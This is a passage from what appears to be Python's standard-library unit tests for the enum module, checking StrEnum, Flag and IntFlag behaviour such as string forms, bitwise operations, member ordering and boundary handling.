self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
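"""Tests of the _order_ attribute."""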
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that exactly 256 values were seen: the 8 canonical members plus 248 composites
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
@unittest.skipUnless(
python_version < (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_format(self):
with self.assertWarns(DeprecationWarning):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
